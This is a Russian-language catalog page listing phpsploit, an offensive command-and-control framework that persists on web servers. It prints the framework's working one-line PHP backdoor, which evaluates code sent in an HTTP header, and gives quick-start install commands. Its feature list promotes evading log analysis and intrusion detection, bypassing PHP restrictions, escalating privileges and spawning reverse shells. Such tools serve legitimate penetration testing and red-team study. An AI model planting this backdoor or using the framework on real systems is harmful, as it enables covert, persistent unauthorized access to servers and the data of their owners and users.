Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
phpsploit — Полнофункциональный C2-фреймворк, который незаметно сохраняется на веб-сервере с помощью однострочного PHP-бэкдора. | Kitploit
Инструменты/GitHubGitHub/nil0x42/phpsploit
Фреймворки для пентестаПовышение привилегийФреймворки для эксплойтовМеханизмы персистентностиЭксплуатация веб-приложенийПост-эксплуатацияКомандование и УправлениеRed TeamingРазработка Полезной Нагрузки
GitHubnil0x42/phpsploit

phpsploit

Полнофункциональный C2-фреймворк, который незаметно сохраняется на веб-сервере с помощью однострочного PHP-бэкдора.

2.5k4682 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

Master

Полнофункциональный C2-фреймворк, который незаметно сохраняется на
веб-сервере с помощью полиморфного PHP-однострочника tweet


Unit Tests workflow Dependabot status codacy code quality CodeQL workflow codecov coverage codeclimate maintainability

Создано nil0x42 и участниками


Обзор

Обфусцированное взаимодействие осуществляется с использованием HTTP-заголовков в стандартных клиентских запросах и ответах веб-сервера, передаваемых через крошечный полиморфный бэкдор:

root@kitploit:~
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

Быстрый старт

root@kitploit:~
git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"

Возможности

  • Эффективность: Более 20 плагинов для автоматизации задач повышения привилегий

    • Выполняйте команды и просматривайте файловую систему, обходя ограничения безопасности PHP
    • Загружайте/скачивайте файлы между клиентом и целью
    • Редактируйте удаленные файлы через локальный текстовый редактор
    • Запускайте SQL-консоль на целевой системе
    • Создавайте обратные TCP-оболочки
  • Скрытность: Фреймворк создан параноиками для параноиков

    • Почти невидим для анализа логов и обнаружения сигнатур NIDS
    • Обход безопасного режима и распространенных ограничений безопасности PHP
    • Взаимодействия скрыты в HTTP-заголовках
    • Загруженные полезные нагрузки обфусцированы для обхода NIDS
    • Поддержка прокси http/https/socks4/socks5
  • Удобство: Надежный интерфейс с множеством важных функций

    • Подробная справка для любой опции (команда help)
    • Кроссплатформенность как на клиенте, так и на сервере
    • CLI поддерживает автодополнение и множественные команды
    • Сохранение/загрузка сессии и постоянная история
    • Поддержка множественных запросов для больших полезных нагрузок (например, загрузок)
    • Предоставляет мощный, легко настраиваемый движок настроек
    • Каждый параметр, например user-agent, имеет полиморфный режим
    • Настраиваемые переменные окружения для взаимодействия с плагинами
    • Предоставляет полный API для разработки плагинов

Поддерживаемые платформы (атакующий):

  • GNU/Linux
  • Mac OS X

Поддерживаемые платформы (цель):

  • GNU/Linux
  • BSD-like
  • Mac OS X
  • Windows NT

Участники

Спасибо этим замечательным людям:

Этот проект следует спецификации all-contributors. Приветствуются любые виды вклада

Скачать инструмент

nil0x42

💻 🚇 🔌 ⚠️

shiney-wh

💻 🔌

Wannes Rombouts

💻 🚧

Amine Ben Asker

💻 🚧

jose nazario

📖 🐛

Sujit Ghosal

📝

Zerdoumi

🐛

tristandostaler

🐛

Rohan Tarai

🐛

Jonas Lejon

📝